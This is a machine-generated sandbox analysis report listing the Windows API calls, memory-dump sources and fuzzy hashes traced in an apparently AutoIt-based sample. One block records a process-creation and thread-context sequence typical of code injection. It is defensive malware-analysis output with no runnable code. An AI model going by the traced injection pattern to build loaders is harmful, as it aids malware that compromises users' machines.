                                                                                        • Part of subcall function 00C11B4A: RegisterWindowMessageW.USER32(00000004,?,00C112C4), ref: 00C11BA2
                                                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00C1136A
                                                                                      • OleInitialize.OLE32 ref: 00C11388
                                                                                      • CloseHandle.KERNEL32(00000000,00000000), ref: 00C524AB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                      • String ID:
                                                                                      • API String ID: 1986988660-0
                                                                                      • Opcode ID: 47bda291ac815819c020e2009c0e30362958031b1f05b03487b99dc08fc7ab70
                                                                                      • Instruction ID: fc474dc0ef742d7fb5baeb16b23db9011aaea6c49752990738dbd2d1299ed5d2
                                                                                      • Opcode Fuzzy Hash: 47bda291ac815819c020e2009c0e30362958031b1f05b03487b99dc08fc7ab70
                                                                                      • Instruction Fuzzy Hash: 8271BEB49023C08EC794DF7AA8C579D3AE4FB8935475D812ADC1ACB3A1EB3444A1DF41
                                                                                      APIs
                                                                                      • CloseHandle.KERNELBASE(00000000,00000000,?,?,00C485CC,?,00CD8CC8,0000000C), ref: 00C48704
                                                                                      • GetLastError.KERNEL32(?,00C485CC,?,00CD8CC8,0000000C), ref: 00C4870E
                                                                                      • __dosmaperr.LIBCMT ref: 00C48739
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseErrorHandleLast__dosmaperr
                                                                                      • String ID:
                                                                                      • API String ID: 2583163307-0
                                                                                      • Opcode ID: 375b93e25a6b703c2776738894e5e3dcee0c766c239baaf777e0eb4359ef7af4
                                                                                      • Instruction ID: b26e2f88c076a3347e4d52ad880a107502cb51cd85bd1981d4b343f0c81cb6ef
                                                                                      • Opcode Fuzzy Hash: 375b93e25a6b703c2776738894e5e3dcee0c766c239baaf777e0eb4359ef7af4
                                                                                      • Instruction Fuzzy Hash: 9C016D33A0566027D6A56734A885BFE77497B82B78F3A011DFC288F1E3DEB1CD859190
                                                                                      APIs
                                                                                      • __Init_thread_footer.LIBCMT ref: 00C217F6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Init_thread_footer
                                                                                      • String ID: CALL
                                                                                      • API String ID: 1385522511-4196123274
                                                                                      • Opcode ID: 37d134b7539ef6b2080d2227d46b29ca91fb65122ed5a89976fb1e8371881873
                                                                                      • Instruction ID: 6d7006eb2a0b5f8b9113805a3ad949e9ec53b76c2c948e55d1779e5e2f368381
                                                                                      • Opcode Fuzzy Hash: 37d134b7539ef6b2080d2227d46b29ca91fb65122ed5a89976fb1e8371881873
                                                                                      • Instruction Fuzzy Hash: 6822CB706083519FC724DF15D480B2ABBF1BF95314F28896DF89A8B7A2D731E941DB82
                                                                                      APIs
                                                                                      • GetOpenFileNameW.COMDLG32(?), ref: 00C52C8C
                                                                                        • Part of subcall function 00C13AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C13A97,?,?,00C12E7F,?,?,?,00000000), ref: 00C13AC2
                                                                                        • Part of subcall function 00C12DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C12DC4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Name$Path$FileFullLongOpen
                                                                                      • String ID: X
                                                                                      • API String ID: 779396738-3081909835
                                                                                      • Opcode ID: 112ee4e29090af4ae7f986d891caa523b0dfc204c57f7261f92e2a804478a6b8
                                                                                      • Instruction ID: 7f55a86e3104a6232dceb9939514fc045fb130b1c26d3795573e90d29bace94b
                                                                                      • Opcode Fuzzy Hash: 112ee4e29090af4ae7f986d891caa523b0dfc204c57f7261f92e2a804478a6b8
                                                                                      • Instruction Fuzzy Hash: 6421C670A002989BDF41DF94C8457EE7BF89F4A305F00405AE505A7341DBB45689EF61
                                                                                      APIs
                                                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C13908
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: IconNotifyShell_
                                                                                      • String ID:
                                                                                      • API String ID: 1144537725-0
                                                                                      • Opcode ID: 4b80f5e8fb86e5ac8130dab4a8331028eeb5136f8268e6ea93ca42c4b80ac650
                                                                                      • Instruction ID: 25d87affa4e93d937e67209b199a307d4bf01f4e4606dc42664de682d9d818f1
                                                                                      • Opcode Fuzzy Hash: 4b80f5e8fb86e5ac8130dab4a8331028eeb5136f8268e6ea93ca42c4b80ac650
                                                                                      • Instruction Fuzzy Hash: BE31E670504341CFE720DF24D8847DBBBE8FB4A718F04092EF99987290E771AA84DB52
                                                                                      APIs
                                                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00C1949C,?,00008000), ref: 00C15773
                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,00C1949C,?,00008000), ref: 00C54052
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFile
                                                                                      • String ID:
                                                                                      • API String ID: 823142352-0
                                                                                      • Opcode ID: e4c417faa18e41c13e0a995b479d5c743e373546151b2336eb1d6136759f57bf
                                                                                      • Instruction ID: cb8184253ddb915a8c603706a53ca480ec5d1d2c65af3e8dd27f377aa7337b83
                                                                                      • Opcode Fuzzy Hash: e4c417faa18e41c13e0a995b479d5c743e373546151b2336eb1d6136759f57bf
                                                                                      • Instruction Fuzzy Hash: 86018431245225FAE7310A26CC0EF9B7F54DF42774F108200BB6C5A1E0CBB45594DBD0
                                                                                      APIs
                                                                                      • __Init_thread_footer.LIBCMT ref: 00C1BB4E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Init_thread_footer
                                                                                      • String ID:
                                                                                      • API String ID: 1385522511-0
                                                                                      • Opcode ID: 88b5f6e0a06c0efb4a998ba6ed8460b028bd00faf55c8f96d8b0db75691bc1be
                                                                                      • Instruction ID: 785b17ffded4520e9ad731b36da90a9a2c1db442cb009d7da7fcfe5bc8f6e441
                                                                                      • Opcode Fuzzy Hash: 88b5f6e0a06c0efb4a998ba6ed8460b028bd00faf55c8f96d8b0db75691bc1be
                                                                                      • Instruction Fuzzy Hash: 9D32A174A00209DFDB24CF55C894BBEB7B9EF46304F248059E915AB2A1C774EE81EF91
                                                                                      APIs
                                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 014E136B
                                                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 014E1401
                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 014E1423
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043178485.00000000014DF000.00000040.00000020.00020000.00000000.sdmp, Offset: 014DF000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_14df000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                      • String ID:
                                                                                      • API String ID: 2438371351-0
                                                                                      • Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                                      • Instruction ID: 45ad83728ad06c7f28074411221ae53caca313cc5643f424496e1de23721969c
                                                                                      • Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                                      • Instruction Fuzzy Hash: A912FD24E24658C6EB24DF64D8507DEB272EF68700F1090E9910DEB7A4E77A4F81CF5A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
Similarity
• API ID: LoadString
• String ID:
• API String ID: 2948472770-0
APIs
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
APIs
  • Part of subcall function 00C14E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00C14EDD,?,00CE1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00C14E9C
  • Part of subcall function 00C14E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00C14EAE
  • Part of subcall function 00C14E90: FreeLibrary.KERNEL32(00000000,?,?,00C14EDD,?,00CE1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00C14EC0
• LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00CE1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00C14EFD
  • Part of subcall function 00C14E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00C53CDE,?,00CE1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00C14E62
  • Part of subcall function 00C14E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00C14E74
  • Part of subcall function 00C14E59: FreeLibrary.KERNEL32(00000000,?,?,00C53CDE,?,00CE1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00C14E87
Similarity
• API ID: Library$Load$AddressFreeProc
• String ID:
• API String ID: 2632591731-0
APIs
Similarity
• API ID: __wsopen_s
• String ID:
• API String ID: 3347428461-0
APIs
  • Part of subcall function 00C44C7D: RtlAllocateHeap.NTDLL(00000008,00C11129,00000000,?,00C42E29,00000001,00000364,?,?,?,00C3F2DE,00C43863,00CE1444,?,00C2FDF5,?), ref: 00C44CBE
• _free.LIBCMT ref: 00C4506C
Similarity
• API ID: AllocateHeap_free
• String ID:
• API String ID: 614378929-0
Similarity
• API ID:
• String ID:
• API String ID:
APIs
Similarity
• API ID: _wcslen
• String ID:
• API String ID: 176396367-0
APIs
• RtlAllocateHeap.NTDLL(00000008,00C11129,00000000,?,00C42E29,00000001,00000364,?,?,?,00C3F2DE,00C43863,00CE1444,?,00C2FDF5,?), ref: 00C44CBE
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
APIs
• RtlAllocateHeap.NTDLL(00000000,?,00CE1444,?,00C2FDF5,?,?,00C1A976,00000010,00CE1440,00C113FC,?,00C113C6,?,00C11129), ref: 00C43852
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
APIs
• FreeLibrary.KERNEL32(?,?,00CE1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00C14F6D
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
APIs
• WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,?,00C5EE51,00CD3630,00000002), ref: 00C7CD26
  • Part of subcall function 00C7CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,00C7CD19,?,?,?), ref: 00C7CC59
  • Part of subcall function 00C7CC37: SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,00C7CD19,?,?,?,?,00C5EE51,00CD3630,00000002), ref: 00C7CC6E
  • Part of subcall function 00C7CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,00C7CD19,?,?,?,?,00C5EE51,00CD3630,00000002), ref: 00C7CC7A
                                                                                      Similarity
                                                                                      • API ID: File$Pointer$Write
                                                                                      • String ID:
                                                                                      • API String ID: 3847668363-0
                                                                                      • Opcode ID: 61a7f678a4d9c4a67563a308470f9d148c6ead40d079f1ff5bafabf222585681
                                                                                      • Instruction ID: 93802810ae028c38e87bb0c602c140e5b7bcdeffc04a2a48982b9295950fabe6
                                                                                      • Opcode Fuzzy Hash: 61a7f678a4d9c4a67563a308470f9d148c6ead40d079f1ff5bafabf222585681
                                                                                      • Instruction Fuzzy Hash: 6BE06D7A500704EFC7219F8ADD418AABBF9FF85360710852FE99AC2110D7B1AA14DB60
                                                                                      APIs
                                                                                      • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C12DC4
                                                                                        • Part of subcall function 00C16B57: _wcslen.LIBCMT ref: 00C16B6A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                       • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: LongNamePath_wcslen
                                                                                      • String ID:
                                                                                      • API String ID: 541455249-0
                                                                                      • Opcode ID: 0c6625b0c231b56218a6c8fd57c5693487d7bbc2f7dc14ffcd092ca3902fe1af
                                                                                      • Instruction ID: 3d100ef68f3ca39f8b7477208162991d90742ff802e8d9be7e25d2b6853f07f5
                                                                                      • Opcode Fuzzy Hash: 0c6625b0c231b56218a6c8fd57c5693487d7bbc2f7dc14ffcd092ca3902fe1af
                                                                                      • Instruction Fuzzy Hash: 31E0C276A042245BCB20E6989C0AFEA77EDDFC9790F0501B1FD09E7248DA60ADC49690
                                                                                      APIs
                                                                                        • Part of subcall function 00C13837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C13908
                                                                                        • Part of subcall function 00C1D730: GetInputState.USER32 ref: 00C1D807
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00C12B6B
                                                                                        • Part of subcall function 00C130F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00C1314E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                       • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                                                      • String ID:
                                                                                      • API String ID: 3667716007-0
                                                                                      • Opcode ID: a4d6ed860dc547f9f9847e5e37ed2a078ae2608b47a7bcdbfe15f7eaae6ac212
                                                                                      • Instruction ID: b3e6a785c25b9396e3a64328fdc571ab5ab12e05430ffaf90ac3e0c87b232de3
                                                                                      • Opcode Fuzzy Hash: a4d6ed860dc547f9f9847e5e37ed2a078ae2608b47a7bcdbfe15f7eaae6ac212
                                                                                      • Instruction Fuzzy Hash: EEE026313042C407CA04BB30A8526EDA3998BD3319F00043EF143472E2CE308AD57352
                                                                                      APIs
                                                                                      • CreateFileW.KERNELBASE(00000000,00000000,?,00C50704,?,?,00000000,?,00C50704,00000000,0000000C), ref: 00C503B7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                       • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFile
                                                                                      • String ID:
                                                                                      • API String ID: 823142352-0
                                                                                      • Opcode ID: 8678e3a9d1b62abc64c9f296d45c58f3279465bd3b52d68aa2d1e5ec9849570e
                                                                                      • Instruction ID: 3d89e53b540e66d35c750de6e90375187ba107a42f7e33baa0d810f9b2d833b0
                                                                                      • Opcode Fuzzy Hash: 8678e3a9d1b62abc64c9f296d45c58f3279465bd3b52d68aa2d1e5ec9849570e
                                                                                      • Instruction Fuzzy Hash: EDD06C3214010DBBDF028F84DD46EDE3BAAFB48714F014000BE1856020C736E821AB90
                                                                                      APIs
                                                                                      • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00C11CBC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                       • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: InfoParametersSystem
                                                                                      • String ID:
                                                                                      • API String ID: 3098949447-0
                                                                                      • Opcode ID: 3d67ceb70d14e527785581e1b9f84decc9b200862f71dfa49b701ca1146745cc
                                                                                      • Instruction ID: c838fcc5682a6e38b41c8ac5e908f5553f484c40a0e506ed8389af4a87ac3e93
                                                                                      • Opcode Fuzzy Hash: 3d67ceb70d14e527785581e1b9f84decc9b200862f71dfa49b701ca1146745cc
                                                                                      • Instruction Fuzzy Hash: D6C09B352803449FF2144B80BDCAF287754A348B04F444001F6095D5F3C7B11820F650
                                                                                      APIs
                                                                                        • Part of subcall function 00C15745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00C1949C,?,00008000), ref: 00C15773
                                                                                      • GetLastError.KERNEL32(00000002,00000000), ref: 00C876DE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                       • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateErrorFileLast
                                                                                      • String ID:
                                                                                      • API String ID: 1214770103-0
                                                                                      • Opcode ID: 46ef1a713e75f8653bf1520e35607612681e28063bf4cdae82e19bc15fabfc17
                                                                                      • Instruction ID: a170216413f0b4c7f5f8b7f2c7c23ad9d6f850d90a72f89d2890db6403472786
                                                                                      • Opcode Fuzzy Hash: 46ef1a713e75f8653bf1520e35607612681e28063bf4cdae82e19bc15fabfc17
                                                                                      • Instruction Fuzzy Hash: 118194306087019FC715EF28C491AA9B7E1BF86314F14462DF8955B3A2EB30ED85EB56
                                                                                      APIs
                                                                                      • Sleep.KERNELBASE(000001F4), ref: 014E1BC1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043178485.00000000014DF000.00000040.00000020.00020000.00000000.sdmp, Offset: 014DF000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_14df000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Sleep
                                                                                      • String ID:
                                                                                      • API String ID: 3472027048-0
                                                                                      • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                      • Instruction ID: e6933d7ddcb23e0aefa2df8b0f23ca80a42ab79b3c28fdf567731667b99f93ef
                                                                                      • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                      • Instruction Fuzzy Hash: 04E0BF7498010DEFDB00EFA4D64D6EE7BB4EF04702F1005A5FD05D7691DB309E548A62
                                                                                      APIs
                                                                                      • CloseHandle.KERNELBASE(?,?,00000000,00C524E0), ref: 00C16266
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                       • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandle
                                                                                      • String ID:
                                                                                      • API String ID: 2962429428-0
                                                                                      • Opcode ID: e275fbfbe8c3ca6db54fcce182c37b64520e26bbdfba5b8a4a2efa6d6b7261e1
                                                                                      • Instruction ID: 12b02be8196bc4f9d2f97764f6eb083f42468ece802bedf7b504809432bc2f78
                                                                                      • Opcode Fuzzy Hash: e275fbfbe8c3ca6db54fcce182c37b64520e26bbdfba5b8a4a2efa6d6b7261e1
                                                                                      • Instruction Fuzzy Hash: C5E09275400B01DEC7314F1AE804492FBE5FFE23613204A2ED0E592660D7B05986DB50
                                                                                      APIs
                                                                                      • Sleep.KERNELBASE(000001F4), ref: 014E1BC1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043178485.00000000014DF000.00000040.00000020.00020000.00000000.sdmp, Offset: 014DF000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
